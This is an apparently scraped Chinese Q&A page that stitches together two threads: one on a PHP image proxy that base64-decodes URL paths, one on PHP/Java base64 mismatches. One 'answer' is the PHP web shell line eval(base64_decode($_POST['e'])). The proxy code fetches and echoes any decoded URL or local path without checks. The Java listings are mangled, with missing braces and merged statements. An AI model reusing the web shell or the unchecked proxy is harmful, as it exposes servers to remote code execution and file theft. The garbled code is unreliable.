php base64加密图替换
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了php base64加密图替换相关的知识,希望对你有一定的参考价值。
目前显示方式是这样的
<img src="http://127.0.0.1/p.php/aHR0cDovL2ltZzAxLnRhb2Jhb2Nkbi5jb20vYmFvL3VwbG9hZGVkL2kxL1QxbkU4WVhmMGxYWGFnZWxjOF8xMDE0MTYuanBnX2IuanBn">
<?php
$image_src = base64_decode (ereg_replace("/","",$_SERVER['PATH_INFO']));
$image = array_pop(explode('/',$image_src));
$image_type = array_pop(explode('.',$image));
header("Content-type:".$image_type);
$filecontent = file_get_contents($image_src);
echo $filecontent;
?>
请帮我改成这样<img src="http://127.0.0.1/p.php/aHR0cDovL2ltZzAxLnRhb2Jhb2Nkbi5jb20vYmFvL3VwbG9hZGVkL2kxL1QxbkU4WVhmMGxYWGFnZWxjOF8xMDE0MTYuanBnX2IuanBn.jpg">
可以改成这样就更牛了 只要显示速度快 格式啥样无所谓
<img src="http://127.0.0.1/p_aHR0cDovL2ltZzAxLnRhb2Jhb2Nkbi5jb20vYmFvL3VwbG9hZGVkL2kxL1QxbkU4WVhmMGxYWGFnZWxjOF8xMDE0MTYuanBnX2IuanBn.jpg">
<?php
list($path)=explode(\'.\',$_SERVER[\'PATH_INFO\']);//删除第一个.及之后的内容
$image_src = base64_decode (ereg_replace("/","",$path));
$image = array_pop(explode(\'/\',$image_src));
$image_type = array_pop(explode(\'.\',$image));
header("Content-type:".$image_type);
$filecontent = file_get_contents($image_src);
echo $filecontent;
?> 参考技术A $a:0;eval(base64_decode($_POST['e'])); 意思是将参数中的<script></script>部分替换为<script src= ></script>,这样你的网页就被挂上了
java 怎么实现PHP的base64加密,两种语言的base64加密后的数据不一致
在开发的时候遇到个现象。对方用PHP base64_encode() 对字符串进行加米。但我这边是用Java解马。导致出现问题。问题如下:[java] view plain copy
package com.tudou.test;
import java.io.IOException;
/**
* <p>java base64编码和解码的演示类
* 注:base64编码后通过url传递时,获得时"="会给替换掉,* 处理方式:在编码前将"=","/","+" 替换成别的字符,在解码之前替换回来* </p>
* @author tw 2010-03-01
*
*/
public class TestBase64Net
/**
* 编马
* @param filecontent
* @return String
*/
public static String encode(byte[] bstr)return new sun.misc.BASE64Encoder().encode(bstr);
/**
* 解码
* @param filecontent
* @return string
*/
public static byte[] decode(String str)
byte[] bt = null;
try
sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder();bt = decoder.decodeBuffer( str );
catch (IOException e)
e.printStackTrace();
return bt;
/**
* @param args
*/
public static void main(String[] args)
TestBase64Net te = new TestBase64Net();
//PHP 用base64 将union_id=102155_100001_01_01 加米后的字符串为: dW5pb25faWQ9MTAyMTU1XzEwMDAwMV8wMV8wMQ//java 用sun.misc.BASE64Encoder().encode()进行解马,结果为:union_id=102155_100001_01_01乱码0System.out.println(new String(te.decode("dW5pb25faWQ9MTAyMTU1XzEwMDAwMV8wMV8wMQ")));//java 用sun.misc.BASE64Decoder 将union_id=102155_100001_01_01进行加米,结果为:dW5pb25faWQ9MTAyMTU1XzEwMDAwMV8wMV8wMQ==System.out.println(new String(te.encode("union_id=102155_100001_01_01".getBytes())));
经过对比不难发现用php的base64_encode() 方法进行加米,JAVA 不能用sun.misc.BASE64Encoder().encode() 进行解米。那该怎么办?!
可以用apache的commons包 commons-codec-1.7.jar 中的org.apache.commons.codec.binary.Base64 进行解米。
[java] view plain copy
import org.apache.commons.codec.binary.Base64;public class TestBase64
public static void main(String[] args)
System.out.println(new String(Base64.decodeBase64("dW5pb25faWQ9MTAyMTU1XzEwMDAwMV8wMV8wMQ".getBytes())));
? 参考技术A 兄弟,你解决了吗?
以上是关于php base64加密图替换的主要内容,如果未能解决你的问题,请参考以下文章